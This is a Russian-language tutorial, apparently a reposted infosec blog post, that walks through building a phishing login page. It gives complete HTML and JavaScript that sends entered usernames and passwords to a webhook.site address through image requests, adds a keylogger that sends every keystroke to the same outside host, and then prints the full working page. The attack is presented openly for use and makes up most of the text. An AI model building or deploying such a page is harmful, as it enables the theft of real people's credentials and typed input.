Привет, ребята!
Сегодня я покажу вам простое создание веб-сайта с формой, которая позволит нам отправлять имя пользователя и пароль на наш удаленный сервер, а также мы добавим кейлоггер на фишинговый сайт.
Давайте начнем.
Для начала создадим графический вид страницы с помощью HTML.
<!DOCTYPE html> <html> <body> <h4> A simple website, nothing suspicious </h4> <label for="domTextElement">Username: </label> <input type="text" id="username" > <br><br> <label for="domTextElement1">Password: </label> <input type="password" id="password" > <br><br> <button type="button" onclick="getValueInput()">click me!! </button> <p id="valueInput"></p> </body> </html>
Я не думаю, что тут много объяснять, важно только помнить имена идентификаторов меток, потому что они нам понадобятся позже.
Теперь начинается самое интересное.
Начнем с создания кода Javascript, который отправит имя пользователя и пароль на наш сервер.
<script>
const getValueInput = () =>{
let inputValue=document.getElementById("username").value;
let inputValue1 = document.getElementById("password").value; var i=new Image();
var j=new Image();
i.src="https://webhook.site/?password="+inputValue1; j.src="https://webhook.site/?username="+inputValue;
window.location.reload();
}
</script>
Код довольно прост, мы создаем две переменные для сохранения имени пользователя и пароля, а затем отправляем их на наш сервер.
window.location.reload() используется для обновления страницы.
Вы можете использовать этот сайт для получения запросов, отправленных нашим скриптом.
Примечание. Не забудьте после получения ссылки поместить ее в код ;)
Теперь мы еще больше расширяем функциональность сайта, внедряя кейлоггер 🔑.
var keys=''; var url = 'http://webhook.site/?c='; document.onkeypress = function(e) { get = window.event?event:e; key = get.keyCode?get.keyCode:get.charCode; key = String.fromCharCode(key); keys+=key; } window.setInterval(function(){ if(keys.length>0) { new Image().src = url+keys; keys = ''; } }, 1);
Javascript-Keylogger/keylogger.js на мастере · JohnHoder/Javascript-Keylogger · GitHub
Код вызывается при нажатии клавиши и отправляет соответствующий символ на сервер.
Вот полный код нашего сайта.
<!DOCTYPE html>
<html>
<body>
<h4> A simple website, nothing suspicious </h4> <label for="domTextElement">Username: </label>
<input type="text" id="username" >
<br><br> <label for="domTextElement1">Password: </label>
<input type="password" id="password" >
<br><br>
<button type="button" onclick="getValueInput()">click me!! </button>
<p id="valueInput"></p>
<script>
const getValueInput = () =>{
let inputValue=document.getElementById("username").value;
let inputValue1 = document.getElementById("password").value; var i=new Image();
var j=new Image();
i.src="https://webhook.site/?password="+inputValue1; j.src="https://webhook.site/?username="+inputValue;
window.location.reload();
}
var keys='';
var url = 'https://webhook.site/?c=';
document.onkeypress = function(e)
{
get = window.event?event:e;
key = get.keyCode?get.keyCode:get.charCode;
key = String.fromCharCode(key); keys+=key;
}
window.setInterval(function(){
if(keys.length>0) {
new Image().src = url+keys;
keys = ''; }
}, 1);
</script>
</body>
</html>
Посмотрим, все ли работает.
Как мы видим, данные были отправлены на наш сайт!
Я надеюсь, что эта статья была вам интересна.
До следующей статьи, пока!
Из статей Infosec. Каждый день в Infosec появляется много информации, за которой сложно уследить. Подпишитесь на нашу еженедельную рассылку, чтобы БЕСПЛАТНО получать все последние тенденции информационной безопасности в виде 5 статей, 4 тем, 3 видео, 2 репозиториев и инструментов Github и 1 оповещения о вакансиях!